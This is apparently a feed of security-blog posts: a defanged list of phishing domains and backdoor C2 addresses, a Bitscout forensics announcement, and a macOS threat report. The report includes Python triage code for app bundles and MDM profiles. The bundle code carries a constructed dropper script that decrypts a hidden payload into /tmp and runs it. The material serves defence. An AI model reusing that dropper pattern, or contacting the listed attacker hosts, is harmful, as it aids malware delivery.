bitflyer[.]team
blog.cloudsecure[.]space
buidihub[.]com
chemistryworld[.]us
circlecapital[.]us
client.googleapis[.]online
cloud.azure-service[.]com
cloud.globalbrains[.]co
cloud.jumpshare[.]vip
cloud.venturelabo[.]co
cloudshare.jumpshare[.]vip
coin-squad[.]co
coinbig[.]dev
coinbigex[.]com
deepmind[.]fund
dekryptcap[.]digital
dllhost[.]xyz:5600
doc.venturelabo[.]co
doc.youbicapital[.]cc
doconline[.]top
docs.azureword[.]com
docs.coinbigex[.]com
docs.gdriveshare[.]top
docs.goglesheet[.]com
docs.securedigitalmarkets[.]co
docstream[.]online
document.antcapital[.]us
document.bhomes[.]cc
document.fastercapital[.]cc
document.kraken-dev[.]com
document.lundbergs[.]cc
document.skandiafastigheter[.]cc
documentprotect[.]live
documentprotect[.]pro
documents.antcapital[.]us
docuserver[.]xyz
domainhost.dynamic-dns[.]net
download.azure-safe[.]com
download.azure-service[.]com
download.gdriveupload[.]site
drives.googldrive[.]xyz
drives.googlecloud[.]live
driveshare.googldrive[.]xyz
dronefund[.]icu
drw[.]capital
eii[.]world
etherscan.mrslove[.]com
faq78.faqserv[.]com
fastdown[.]site
fastercapital[.]cc
file.venturelabo[.]co
filestream[.]download
foundico.mefound[.]com
galaxydigital[.]cc
galaxydigital[.]cloud
googledrive[.]download
googledrive[.]email
googledrive[.]online
googledrive.publicvm[.]com
googleexplore[.]net
googleservice[.]icu
googleservice[.]xyz
gsheet.gdocsdown[.]com
hiccup[.]shop
innoenergy[.]info
isosecurity[.]xyz
jack710[.]club
jumpshare[.]vip
kraken-dev[.]com
ledgerservice.itsaol[.]com
lemniscap[.]cc
lundbergs[.]cc
mail.gdriveupload[.]info
mail.gmaildrive[.]site
mail.googleupload[.]info
mclland[.]com
microstratgey[.]com
miss.outletalertsdaily[.]com
msoffice.qooqle[.]download
note.onedocshare[.]com
onlinedocpage[.]org
page.googledocpage[.]com
product.onlinedoc[.]dev
protect.antcapital[.]us
protect.azure-drive[.]com
protect.venturelabo[.]co
protectoffice[.]club
pvset.itsaol[.]com
qooqle[.]download
qoqle[.]online
regcnlab[.]com
reit[.]live
securedigitalmarkets[.]ca
share.bloomcloud[.]org
share.devprocloud[.]com
share.docuserver[.]xyz
share.stablemarket[.]org
sharedocs[.]xyz
signverydn.sharebusiness[.]xyz
sinovationventures[.]co
skandiafastigheter[.]cc
slot0.regcnlab[.]com
svr04.faqserv[.]com
tokenhub.mefound[.]com
tokentrack.mrbasic[.]com
twosigma.publicvm[.]com
up.digifincx[.]com
upcraft[.]io
updatepool[.]online
upload.gdrives[.]best
venturelabo[.]co
verify.googleauth[.]pro
word.azureword[.]com
www.googledocpage[.]com
www.googlesheetpage[.]org
www.onlinedocpage[.]org
youbicapital[.]cc

C2 address used by backdoor
118.70.116[.]154:8080
163.25.24[.]44
45.238.25[.]2
devstar.dnsrd[.]com
fxbet.linkpc[.]net
lservs.linkpc[.]net
mmsreceive.linkpc[.]net
msservices.hxxps443[.]org
onlineshoping.publicvm[.]com
palconshop.linkpc[.]net
pokersonic.publicvm[.]com
press.linkpc[.]net
rubbishshop.linkpc[.]net
rubbishshop.publicvm[.]com
socins.publicvm[.]com
vpsfree.linkpc[.]net

Update: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate service/application.

Cybersecurity Research During the Coronavirus Outbreak and After
https://securelist.com/cybersecurity-research-during-the-coronavirus-outbreak-and-after/96275/
Thu, 20 Feb 2020 11:03:40 +0000

Virus outbreaks are always gruesome: people, animals or computer systems get infected within a short time. Of course, viruses spreading across our physical world always take priority over the virtual world. Nevertheless, everyone should keep doing their job, which includes all kinds of malware researchers, digital forensics experts and incident responders. At times like this, we all realize how important it is to be able to work remotely. However, the duties of a security researcher or a digital forensics expert push them to travel, visit victims or collect digital evidence in an ongoing hunt for malware artefacts. What can we do to reduce the need for travel? Of course, keep looking for replacements for our physical routines with remote ones.

It is about two and a half years since we first open-sourced a tool for remote digital forensics called Bitscout. Born while I was with the Digital Forensics Lab at INTERPOL, the tool has evolved and helped us in many cyberinvestigations. Based on the widely popular Ubuntu Linux distribution, it is packed with forensics and malware analysis tools created by a large number of excellent developers around the world.

What can it do? Well, we have tried to identify what it is that it *cannot* do and other expensive commercial tools used in digital forensics can. We have not really been able to find anything! Moreover, we have built so many new interesting techniques that are not available in commercial tools that it has every chance to replace commercial solutions in your organization if it gets into the right hands.

Let me just remind you about the approach we use in Bitscout:

  1. Bitscout is completely FREE, which helps reduce your forensics budget! Yay!
  2. It is designed to be remote, which also saves the time and money spent on travelling. And of course you can use the same techniques locally! To be frank, in light of the power of all those forensic tools that are part of the toolkit, Bitscout itself is the least important element: the true value is in the knowledge of the underlying tools that you gain access to by using Bitscout, not the product they ship with.
  3. Mastering Bitscout follows a steep curve, which, in the end, reinforces your experts’ technical foundations.
  4. Bitscout records remote forensics sessions internally, which makes it perfect for replaying and learning from more experienced users or using as evidential proof of discovery.
  5. It is fully open source, so you need not wait for the vendor to implement a patch or feature for you: you are free to reverse-engineer and modify any part of it.

Today, I am happy to announce that we are releasing a new version of Bitscout, based on the upcoming release of Ubuntu 20.04, scheduled for April 2020.

So, what is new in Bitscout 20.04 other than the extended hardware support that comes with the new OS and updated forensics tools from Canonical Ltd’s official repositories?

First of all, we have launched a project website at bitscout-forensics.info.

The website should become the go-to destination for those looking for tips and tricks on remote forensics using Bitscout and whatnot. In reality, Bitscout had been our internal tool for a long time and had been used only by a limited number of highly skilled researchers, who knew exactly how to use it. Yes, like many researchers, we lacked proper documentation and manuals, which we will address with our new website. We have already linked several presentation videos and slides with live demos shown at security conferences and meetups. It is true that some of the commands we used in our demos are crazy long one-liners. So, to make it easy for you to copy them and try them out, we have started recording terminal sessions as ASCII video casts. Kudos to the awesome folks at asciinema.org! This way, should you want to try some of our black magic recipes, you can copy and paste them from a browser or a terminal into your own session.

Second, to address a popular request, we have released demo versions of three flavors of pre-built Bitscout images: minimal, balanced and full. This way, newcomers can easily try Bitscout without going through the whole build process. The download URLs for the ISO image files are available on the project website. However, please note they must not be used in a production environment.

Third, our little community of contributors keeps growing. I am happy to highlight some of the features contributed by others. Kudos to Xavier Mertens aka @xme!

  1. The following new tools from the security community are now part of Bitscout (full build) by default:
    • RegRipper,
    • Bulk Extractor,
    • Loki.

    It is great to have modern scanners such as Loki with an updated rich collection of Yara rules that comes with it.

  2. Optional logging of bash commands to a remote syslog server. This is particularly useful for environments where a Bitscout instance may be unexpectedly powered off or disconnected for a long time due to a network failure. It is also a great way to remember which commands you have run to find the clues.

And, if it feels hard for you to start using Bitscout, then join our training session on April 5-6 in the beautiful city of Barcelona, Spain. We will be demonstrating how to build your own Bitscout and customize it with your own tools, and of course walking you through the standard forensics procedure. Some of our advanced tasks include hypervisor debugging to overcome just about any type of proprietary full disk encryption. Our exercises will focus on the most popular platforms, covering Windows, Linux and macOS forensics challenges, along with some real malware. Stay safe and we hope to see some of you in Barcelona! Join us there!

Threats to macOS users
https://securelist.com/threats-to-macos-users/93116/
Wed, 11 Sep 2019 10:00:05 +0000

Introduction

The belief that there are no threats for the macOS operating system (or at least no serious threats) has been bandied about for decades. The owners of MacBooks and iMacs are only rivaled by Linux users in terms of the level of confidence in their own security, and we must admit that they are right to a certain degree: compared to Windows-based systems, there are far fewer threats that target macOS. However, the main reason for this is the number of potential victims: there are many more computers running Windows than those running macOS. The situation is changing, though, since the popularity of the latter platform is growing. Due to this, and despite all the efforts Apple has taken, the threat landscape for Apple devices is changing, and the amount of malicious and unwanted software is growing.

For the purposes of this report we used the statistics from Kaspersky Security Network cloud infrastructure. It stores information about all of the malicious programs and other threats that our macOS product users agreed to anonymously share with us. In fact, all these threats at some point attacked the computers of Kaspersky security solution users, but these attacks were successfully repelled.

Phishing

  • During the first half of 2019, we detected nearly 6 million phishing attacks on macOS users. Of these, 11.80% targeted corporate users.
  • The countries with the largest share of unique macOS users who experienced phishing attacks were Brazil (30.87%), India (22.08%), and France (22.02%).
  • The number of phishing attacks that make use of the Apple brand name grows by 30–40% every year. In 2018, the number of such attacks approached 1.5 million. As of June, the number of phishing attacks in 2019 has already exceeded 1.6 million, which is an increase of 9% over the entire previous year.

Malicious and potentially unwanted software

  • From 2012 to 2017, the number of macOS users who have experienced attacks from malicious and potentially unwanted programs grew, approaching 255,000 attacked users per year. However, starting in 2018, the number of attacked users began to decrease, and in the first half of 2019 it only amounted to 87,000.
  • The number of attacks on macOS users through malicious and potentially unwanted programs has been increasing annually since 2012, and in 2018 it exceeded 4 million attacks. During the first half of 2019, we registered 1.8 million attacks of this kind.
  • The vast majority of threats for macOS in 2019 were in the AdWare category. As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.
  • More than a quarter of Mac users who are protected by Kaspersky solutions and have experienced malicious and potentially unwanted software attacks live in the USA.

Phishing for Mac users

We started collecting detailed statistics on phishing threats that target macOS users in 2015. The data that has been collected over the last four years suggests that the number of phishing attacks on macOS users is definitely growing, and quite rapidly at that. While in 2015 we registered a total of 852,293 attacks, in 2016 this figure grew by 86% to over 1.5 million, and in 2017 it skyrocketed to 4 million. In 2018, the number of attacks continued to grow, crossing the 7.3 million mark. At this point we can see that during the first half of 2019 alone, 5,932,195 attacks were committed, which means that the number of attacks may exceed 16 million by the end of the year if the current trend continues.

Growth in the number of phishing attacks on macOS users, 2015–2019

The share of corporate macOS users who faced phishing attacks during the first half of 2019 came up to 11.80%. This is a slight increase compared to the same period in 2018, when this category made up 10.25%.

The phishing page subject matters

In order to understand what services phishing pages impersonate, we analyzed the most common phishing tricks and the geography of attacked users. Then we compared the results with the data from the same period of 2018.

Both in 2019 and 2018, the phishing pages visited by macOS users most often pretended to be banking services (39.95% in 2019 and 29.68% in 2018), the second most popular being global Internet portals (21.31% in 2019 and 27.04% in 2018). Social networks came in third in 2019 (12.3%), taking the place of online stores (10.75% in 2018).

H1 2018                               | H1 2019
Banks                          29.68% | Banks                          39.95%
Global Internet portals        27.04% | Global Internet portals        21.31%
Online stores                  10.75% | Social networks                12.30%
Payment systems                 6.63% | Payment systems                 8.40%
Telecommunications companies    5.22% | Online stores                   8.24%
Social networks                 5.06% | Web services                    4.70%
Financial services              4.87% | Telecommunications companies    2.06%
Web services                    4.16% | IT companies                    0.49%
Messengers                      1.19% | Online games                    0.44%
Online games                    1.06% | Financial services              0.35%
Other                           4.35% | Other                           1.76%

Phishing pages by share of users, first halves of 2018 and 2019

Geography

The countries with the largest share of unique macOS product users facing phishing attacks during the first half of 2019 were Brazil (30.87%), India (22.09%), and France (22.02%). In 2018, the top three countries were the same as in 2019. The only difference was in the percentages of users who were attacked: Kaspersky solutions prevented attacks against one out of four Mac product users in Brazil (26.02%), against one out of five in France (20.86%) and 17.70% in India.

H1 2018                            | H1 2019
Country        % of attacked users | Country        % of attacked users
Brazil                      26.02% | Brazil                      30.87%
France                      20.86% | India                       22.09%
India                       17.70% | France                      22.02%
Spain                       17.40% | Spain                       22.01%
Hong Kong                   15.65% | Australia                   20.08%
Australia                   15.14% | Mexico                      19.89%
Great Britain               14.43% | Italy                       18.36%
Mexico                      13.53% | Great Britain               18.11%
Canada                      13.49% | Canada                      18.06%
Italy                       13.11% | Russia                      17.25%

Geography of phishing attacks by share of users, first halves of 2018 and 2019

Spam and phishing attacks that impersonate Apple

Among the phishing attacks faced by macOS users we would separately focus on fake web pages that mimic Apple’s official pages or simply mention the brand. Not so long ago, in 2016, there were relatively few attacks (755,000) that tried to take advantage of the brand. But in 2017 they had grown by almost 40% to exceed 1 million, and a year later they almost reached 1.5 million. We have every reason to believe that a new record will be set in 2019: during the first half of the year alone, our solutions prevented more than 1.6 million attacks, which means that by the end of the year we can expect at least twofold growth.

Number of phishing attacks using the Apple brand, 2016–2019

Let’s take a closer look at some examples of phishing pages that mimic the official Apple website. Naturally, most commonly these phishing attacks aim to steal users’ Apple IDs.

Examples of phishing pages that are designed to steal AppleIDs

Links to these sites are usually sent in emails that allegedly come from Apple Support. The recipient is threatened that their account will be locked unless they click the link and log in to confirm the information that has been specified in their profile.

Examples of phishing emails that have been sent to steal an AppleID

Another phishing trick is thank you messages for purchasing an Apple device or app on the App Store. The “client” is invited to learn more about the product (or cancel the purchase) by clicking a link that leads to a phishing page. Here, the victim is required to enter their Apple ID login and password, which, of course, will be sent to the attackers.

Fake malware attacks

Another variation on phishing web pages is a page that pretends to warn the user of a malware infection. The design of these notifications varies; some are of very high quality and faithfully copy the official Apple website. The threat of an infection is supposed to convince the user to call a fake support number or install a fake antivirus application, which turns a non-existent threat into a real one.

Example phishing page that provides a notification of a nonexistent infection

Malicious and unwanted programs for macOS

At the time of writing, our database contained 206,759 unique malicious and potentially unwanted files for macOS. The diagram below illustrates the growth of our database, i.e., the number of abovementioned files that were added to the database in a given year.

The number of malicious and potentially unwanted files for macOS, 2004–2019

As you can see from the diagram, up to 2011 the number of malicious files targeting macOS detected each year was insignificant. Then the situation changed: starting in 2012, the number of files we collected began to double year over year. However, during the first half of 2019 only 38,677 malicious and potentially unwanted objects were collected, so we do not expect 2019 to show a similar increase over 2018.

In order to identify the changes in the number of macOS users who were attacked by malware in recent years, we examined our statistics from 2012 (the time when data was first systematized) to the present. Much like in the diagram above, you can see a sharp increase in the number of users who were attacked between 2012 and 2017.

Number of unique macOS users attacked by malware, 2012 to June 2019

In order to roughly estimate how often macOS users are attacked by both malicious and unwanted software, we can look at the diagram that illustrates the number of times that Kaspersky products have detected either of the threats.

Number of times that Kaspersky products detected malware and potentially unwanted software for macOS, 2012 to June 2019

This diagram clearly shows an increase in the number of attacks that occurred in 2018. At the same time, the data for 2019 (1,820,578 attacks over the first 5 months) suggests that this year the number of attacks will decline.

Geography of attacks

In order to get an idea of the geographical distribution of threats for macOS and to determine if there are regions where users are more likely to be attacked by malicious software nowadays, we compiled a rating of countries by the share of unique users attacked in the first half of 2019, and, for the sake of comparison, in the first half of 2018.

 #   H1 2018                                H1 2019
     Country         % of attacked users*   Country         % of attacked users*
 1   USA             29.2%                  USA             24.4%
 2   Germany         11.9%                  Germany         14.6%
 3   France           8.3%                  France          12.4%
 4   Great Britain    7.3%                  Great Britain    6.8%
 5   Canada           4.7%                  Spain            5.1%
 6   Russia           4.3%                  Japan            4.7%
 7   Spain            3.8%                  Russia           4.6%
 8   Italy            2.8%                  Canada           4.1%
 9   Japan            2.7%                  Italy            4.0%
10   Brazil           2.5%                  Brazil           2.9%

* Share of unique users attacked out of all users of Kaspersky products for macOS in the country

The top three countries remained the same between 2018 and 2019: the United States came in first place (24.4%), Germany came in second (14.6%), and France came in third (12.4%).

2019 threats

Here are the TOP 10 threats for macOS that we have observed during the first half of 2019:

Verdict %*
HEUR:Trojan-Downloader.OSX.Shlayer.a 21.74%
not-a-virus:HEUR:AdWare.OSX.Bnodlero.q 16.34%
not-a-virus:HEUR:AdWare.OSX.Spc.a 12.75%
not-a-virus:HEUR:AdWare.OSX.Geonei.as 10.24%
not-a-virus:AdWare.OSX.Geonei.ap 10.24%
not-a-virus:HEUR:AdWare.OSX.Pirrit.j 7.78%
not-a-virus:HEUR:AdWare.OSX.Pirrit.p 7.60%
not-a-virus:AdWare.OSX.Agent.b 6.17%
not-a-virus:HEUR:AdWare.OSX.Pirrit.o 6.00%
not-a-virus:HEUR:AdWare.OSX.MacSearch.a 5.82%

* The share of unique users attacked by this malware out of all users of Kaspersky security solutions for macOS who have been attacked

With the exception of the Shlayer trojan in first place (more on that a little later), the rest of the top ten is filled out by various unwanted software of the AdWare class. The objective of these programs, as the name suggests, is to display ads wherever possible: in system notifications, web page banners, search results pages, the browser, etc. This does no direct harm to the user, but it certainly does not make the computer more pleasant to use.

Example of malware installed or advertised to users by some types of AdWare

Let us proceed from a general description to specific examples. The AdWare.OSX.Bnodlero family prefers to work with the browser: it installs advertising extensions and changes the default search engine and homepage. In addition, it can download and install further adware.

Some samples in the AdWare.OSX.Pirrit family go further and install a proxy server on the victim’s machine to intercept browser traffic. A closely related family is Agent.b, since it is precisely this unwanted software that frequently downloads Pirrit. When it is not busy downloading, unpacking and launching files, Agent.b injects advertising JavaScript into the web pages the victim views.

We would also like to mention the AdWare.OSX.Cimpli family. At first glance it is no different from other adware. However, its samples behave more cunningly and deliberately go dormant if they detect a security solution installed on the Mac.

When they detect these types of applications, AdWare.OSX.Cimpli family samples prefer to stay inactive

We assume this feature was added to Cimpli to keep it out of the databases of security software developers and, as a result, from being blocked. If the user later removes the security solution, the adware wakes up and starts working.

The Trojan-Downloader.OSX.Shlayer family, which heads our top ten ranking, downloads and installs various AdWare, mainly from the Bnodlero family (and this is one of the reasons why Bnodlero ranks second).

Why do we detect this particular family so often? It all has to do with how widely it is distributed: if you try to search for sites where you can watch or download a popular movie or TV series for free, the very first search results will lead to resources that request you to update Flash Player in order to view content. It is these updates that contain Shlayer.

Link to a site with Shlayer on the first search results page

Note that this technique of pushing a link to a malicious page up in the search results for certain queries is also used by distributors of other malware. Not so long ago, we studied the threats that target Game of Thrones and other popular TV series fans who wanted to download new and not yet released episodes or watch them online.

One of the websites encouraging users to download malware under the pretext of updating Flash Player

It is worth noting that from the technical point of view, Shlayer is nothing special. Its main executable file is a Bash script that consists of only four lines of code. All that it does is decrypt and run another file that it brings along with it, which in turn downloads, decrypts, and executes another file, which does exactly the same. In the end, this nesting doll of various malware installs several AdWare programs, hides them well and registers them to run at startup.

The main executable file of the Shlayer Trojan is just the outer layer of a nesting doll
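The nesting-doll structure described above suggests a cheap triage check for a defender: a genuine app bundle’s main executable is a Mach-O binary, while a Shlayer-style dropper’s is a shell script that decrypts and runs something it carries. The Python below is an added example written for this page, not Kaspersky’s detection logic or Shlayer’s actual script. The two .app bundles it builds (a script-based “FlashPlayerUpdate” and a Mach-O “ExampleApp”) are constructed, and the script indicators it looks for are this example’s own heuristics.

```python
import os
import plistlib
import re
import stat
import tempfile

# Mach-O and universal ("fat") binary magics in both byte orders: a compiled
# macOS executable starts with one of these.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",  # fat / universal
}

# Generic "decrypt a bundled blob and run it" dropper traits. These are this
# example's own heuristics, not a signature for a particular family.
SCRIPT_INDICATORS = [
    ("locates its own bundle directory", re.compile(r'dirname\s+"?\$0"?')),
    ("decrypts with openssl", re.compile(r"\bopenssl\s+enc\b.*\s-d\b")),
    ("decodes base64", re.compile(r"\bbase64\b.*(-D|-d|--decode)\b")),
    ("makes a file executable", re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")),
    ("writes to a hidden path", re.compile(r"(/tmp|\$HOME|~)/\.[A-Za-z0-9]")),
]


def classify_main_executable(app_path):
    """Inspect <app>.app/Contents/MacOS/<CFBundleExecutable>.

    Returns a dict whose 'kind' is 'mach-o', 'script' or 'unknown'. For a
    script, 'indicators' lists the matched heuristics and 'bundled_files' the
    other files in Contents/MacOS, which is where a dropper keeps the payload
    it decrypts."""
    contents = os.path.join(app_path, "Contents")
    with open(os.path.join(contents, "Info.plist"), "rb") as f:
        exe_name = plistlib.load(f)["CFBundleExecutable"]
    macos_dir = os.path.join(contents, "MacOS")
    with open(os.path.join(macos_dir, exe_name), "rb") as f:
        head = f.read(4096)
    report = {"executable": exe_name, "kind": "unknown", "indicators": [], "bundled_files": []}
    if head[:4] in MACHO_MAGICS:
        report["kind"] = "mach-o"
    elif head.startswith(b"#!"):
        text = head.decode("utf-8", "replace")
        report["kind"] = "script"
        report["indicators"] = [name for name, rx in SCRIPT_INDICATORS if rx.search(text)]
        report["bundled_files"] = sorted(n for n in os.listdir(macos_dir) if n != exe_name)
    return report


def is_suspicious(report, min_indicators=2):
    """A script standing in for the bundle's executable is unusual; a script that
    also decrypts or decodes something and runs it is a dropper signal."""
    return report["kind"] == "script" and len(report["indicators"]) >= min_indicators


def _write_bundle(root, name, executable, extra_files=()):
    """Create a minimal .app layout on disk for exercising the classifier."""
    app = os.path.join(root, name + ".app")
    macos_dir = os.path.join(app, "Contents", "MacOS")
    os.makedirs(macos_dir)
    with open(os.path.join(app, "Contents", "Info.plist"), "wb") as f:
        plistlib.dump({"CFBundleExecutable": name,
                       "CFBundleIdentifier": "com.example." + name.lower()}, f)
    exe = os.path.join(macos_dir, name)
    with open(exe, "wb") as f:
        f.write(executable)
    os.chmod(exe, os.stat(exe).st_mode | stat.S_IXUSR)
    for fname, data in extra_files:
        with open(os.path.join(macos_dir, fname), "wb") as f:
            f.write(data)
    return app


# Constructed stand-in for a script-based dropper: it is never executed here and
# is not the actual Shlayer script, only the shape the text describes.
FAKE_DROPPER_SCRIPT = b"""#!/bin/bash
cd "$(dirname "$0")"
openssl enc -aes-256-cbc -d -a -in Player.dat -out /tmp/.Player -pass pass:constructed
chmod +x /tmp/.Player && /tmp/.Player
"""


def build_sample_bundles(root=None):
    """Build one script-based and one Mach-O-based bundle and classify both."""
    root = root or tempfile.mkdtemp(prefix="bundles-")
    dropper = _write_bundle(root, "FlashPlayerUpdate", FAKE_DROPPER_SCRIPT,
                            extra_files=[("Player.dat", b"U2FsdGVkX1" + b"A" * 64)])
    genuine = _write_bundle(root, "ExampleApp", b"\xcf\xfa\xed\xfe" + b"\x00" * 60)
    return {"dropper": classify_main_executable(dropper),
            "genuine": classify_main_executable(genuine)}


if __name__ == "__main__":
    for label, report in build_sample_bundles().items():
        verdict = "suspicious" if is_suspicious(report) else "ok"
        print(label, report["kind"], verdict, report["indicators"])
```

Run classify_main_executable over every .app under /Applications and the user’s Downloads folder and treat the result as triage, not a verdict: some legitimate launchers are app wrappers around a shell script, which is why is_suspicious requires several dropper indicators rather than the mere presence of a script.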

Two other malware families that we encountered during the first half of the year are Trojan.OSX.Spynion and Trojan-Downloader.OSX.Vidsler. Both are far from being as popular as Shlayer, as they have been encountered by less than one percent of our users. However, each of them utilizes its own method of deceiving a potential victim, and both deserve attention.

Trojan.OSX.Spynion is distributed along with several free macOS apps, mainly from download sites such as MacUpdate, VersionTracker and Softpedia. While the app is being installed on the victim’s computer, a malicious component is downloaded and installed alongside it. Spynion’s main objective is to monitor the user’s network activity and transfer intercepted confidential data to the attackers’ servers. The trojan also has backdoor functionality, i.e. it allows the attackers to connect remotely to the victim’s Mac.

Trojan-Downloader.OSX.Vidsler is distributed via banner ad links, only this time under the pretext of requiring the user to update video codecs or download a new version of a video player. In terms of functionality, Vidsler is similar to Shlayer: it downloads, installs, and runs other software, most often from the FkCodec AdWare family.

Lastly, we should point out several rather dangerous trojans, which, fortunately, are not encountered very frequently in the wild. For example, the Trojan-Ransom.OSX.KeRanger family ransomware trojans encrypt all of the user’s files on the drive and demand a ransom to decrypt them. This malware is known to have been distributed through the official website of the Transmission torrent client. Another example is the Trojan-Spy.OSX.Ventir trojan, which has a complex modular architecture and contains not only a backdoor to remotely access the victim’s macOS, but also a keylogger.

MacOS and targeted attacks

Our statistics concerning threats for macOS provide fairly convincing evidence that the stories about this operating system’s complete safety are nothing more than that. However, the biggest argument against the idea that macOS (and iOS as well) is invulnerable to attack is the fact that there already have been attacks against individual users of these operating systems and groups of such users. Over the past few years, we have seen at least eight campaigns whose organizers acted on the presumption that the users of MacBook, iPhone, and other devices do not expect to encounter malware created specifically for Apple platforms.

Because of Apple’s policy on antivirus software, the Kaspersky product line does not include a security solution for iOS, so we have no statistics on threats for this operating system. However, alongside malware for Android, Kaspersky researchers have also encountered malicious implants for iOS.

Next, we will provide an overview of what we consider to be the most interesting targeted attacks against the macOS and iOS platforms that we have been investigating over 2018 and 2019.

The Skygofree implant for iOS (January 2018)

Soon after the discovery of the Skygofree Android implant, Kaspersky experts found and analyzed an implant for iOS developed by the same group. It was discovered during analysis of the Skygofree infrastructure and consisted of several iOS configuration profiles (MobileConfig files) used to enroll the device with an MDM server.
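A .mobileconfig profile is a property list, so an analyst handed one of these files can inspect it before anyone installs it. The Python below is an added example for this page, not code from the Skygofree investigation: it parses a constructed (not real) enrollment profile, flags the payload types that hand control to a third party, checks the MDM server URLs against an allowlist of hosts the organization actually runs (hypothetical hostnames here), and decodes a subset of the AccessRights bitmask that Apple’s MDM protocol defines.

```python
import plistlib
from urllib.parse import urlparse

# Apple payload type identifiers; the one-line descriptions are this example's own.
WATCHED_PAYLOADS = {
    "com.apple.mdm": "MDM enrollment: hands device management to the server named in the payload",
    "com.apple.security.root": "installs a trusted root CA, which makes TLS interception possible",
    "com.apple.security.scep": "enrolls a device identity certificate via SCEP",
    "com.apple.vpn.managed": "installs a VPN configuration that can carry all device traffic",
}

# Subset of the MDM AccessRights bitmask defined in Apple's MDM protocol reference.
ACCESS_RIGHT_BITS = {
    1: "inspect installed configuration profiles",
    2: "install and remove configuration profiles",
    4: "lock the device and clear its passcode",
    8: "erase the device",
    16: "query device information",
}

# Constructed sample, not a Skygofree artifact: a profile the user cannot remove,
# which installs a root CA and enrolls the device with a hypothetical MDM host.
SAMPLE_MOBILECONFIG = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>PayloadType</key><string>Configuration</string>
  <key>PayloadIdentifier</key><string>com.example.carrier-update</string>
  <key>PayloadUUID</key><string>5B1E8C2A-7D3F-4E6B-9A0C-1F2E3D4C5B6A</string>
  <key>PayloadVersion</key><integer>1</integer>
  <key>PayloadDisplayName</key><string>Carrier Settings Update</string>
  <key>PayloadRemovalDisallowed</key><true/>
  <key>PayloadContent</key>
  <array>
    <dict>
      <key>PayloadType</key><string>com.apple.security.root</string>
      <key>PayloadIdentifier</key><string>com.example.carrier-update.ca</string>
      <key>PayloadUUID</key><string>9C8B7A6D-5E4F-4A3B-8C2D-1E0F9A8B7C6D</string>
      <key>PayloadVersion</key><integer>1</integer>
      <key>PayloadContent</key><data>MIIBAA==</data>
    </dict>
    <dict>
      <key>PayloadType</key><string>com.apple.mdm</string>
      <key>PayloadIdentifier</key><string>com.example.carrier-update.mdm</string>
      <key>PayloadUUID</key><string>0A1B2C3D-4E5F-4061-8283-94A5B6C7D8E9</string>
      <key>PayloadVersion</key><integer>1</integer>
      <key>ServerURL</key><string>https://mdm.update-service.example/mdm</string>
      <key>CheckInURL</key><string>https://mdm.update-service.example/checkin</string>
      <key>Topic</key><string>com.apple.mgmt.External.constructed</string>
      <key>AccessRights</key><integer>8191</integer>
      <key>IdentityCertificateUUID</key><string>9C8B7A6D-5E4F-4A3B-8C2D-1E0F9A8B7C6D</string>
    </dict>
  </array>
</dict>
</plist>
"""


def check_mdm_payload(payload, trusted_mdm_hosts):
    """Findings for one com.apple.mdm payload: server URLs and granted rights."""
    out = []
    for key in ("ServerURL", "CheckInURL"):
        url = payload.get(key)
        if not url:
            continue
        parsed = urlparse(url)
        if parsed.scheme != "https":
            out.append(f"{key} is not https: {url}")
        if parsed.hostname not in trusted_mdm_hosts:
            out.append(f"{key} points at an untrusted MDM host: {parsed.hostname}")
    rights = int(payload.get("AccessRights", 0))
    granted = [desc for bit, desc in ACCESS_RIGHT_BITS.items() if rights & bit]
    if granted:
        out.append("MDM server may: " + "; ".join(granted))
    return out


def inspect_profile(data, trusted_mdm_hosts):
    """Return findings for an unsigned .mobileconfig (XML or binary plist).
    A CMS-signed profile must have its signature envelope removed first,
    which this example does not do."""
    profile = plistlib.loads(data)
    findings = []
    if profile.get("PayloadRemovalDisallowed"):
        findings.append("user cannot remove this profile (PayloadRemovalDisallowed)")
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType", "")
        if ptype in WATCHED_PAYLOADS:
            findings.append(f"{ptype}: {WATCHED_PAYLOADS[ptype]}")
        if ptype == "com.apple.mdm":
            findings.extend(check_mdm_payload(payload, trusted_mdm_hosts))
    return findings


if __name__ == "__main__":
    for line in inspect_profile(SAMPLE_MOBILECONFIG, frozenset({"mdm.corp.example.com"})):
        print("-", line)
```

An MDM profile cannot install itself: on iOS the user has to open the file and tap through the installation prompts, so a profile that arrives by link or email is a social-engineering lure, and a check like this belongs in the hands of whoever triages such files. The allowlist is the important input: an enrollment payload is only legitimate when the ServerURL is the organization’s own MDM.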

Sofacy XAgent (March 2018)

Kaspersky experts closely follow the activity of Sofacy, one of the most professional cyber-espionage groups. One of the tools at its disposal is XAgent, a set of malware sharing a common code base, with each sample individually modified to infect a specific OS, including macOS and iOS. However, the most recent versions of this malware for iOS that we have detected date back to the end of 2014 and the beginning of 2015, which may mean that the group has (at least temporarily) lost interest in iPhones and iPads.

While studying the Skygofree iOS implant, our experts attempted to find other campaigns that used the results of the Intrepidus Group’s research into Apple’s MDM system to compromise iOS devices. In the course of this search, several servers presumably belonging to the Bahamut group, active since 2017, were discovered.

Operation AppleJeus (August 2018)

While investigating an attack on a cryptocurrency exchange service conducted by the Lazarus group, we discovered that the attackers sent out messages to potential victims with a link to a malicious macOS cryptocurrency trading app.

ThreatNeedle and Manuscrypt (October 2018)

In 2018, we also found new activity involving Manuscrypt, a piece of malware used exclusively by the Lazarus group. The new samples differed noticeably from those exposed in earlier campaigns, so we gave them a new name: ThreatNeedle.

Windtail (December 2018)

Shortly after Dark Matter published its findings about the Windshift group in August 2018, we conducted our own investigation on the activities of this group. In particular, we were interested in a piece of macOS malware called Windtail.

New macOS malware from Lazarus (January 2019)

Six months after Operation AppleJeus, we discovered a new Lazarus campaign with similar symptoms: again companies from the financial sector were hit, and again previously unknown macOS malware was used in the attack.

New iOS implant version from FinSpy (mid 2019)

At the end of 2018, we discovered a new version of the FinSpy iOS implant in the wild, apparently developed during the summer of that year. This implant was part of the FinSpy Mobile product sold by the well-known surveillance software vendor.

Conclusion

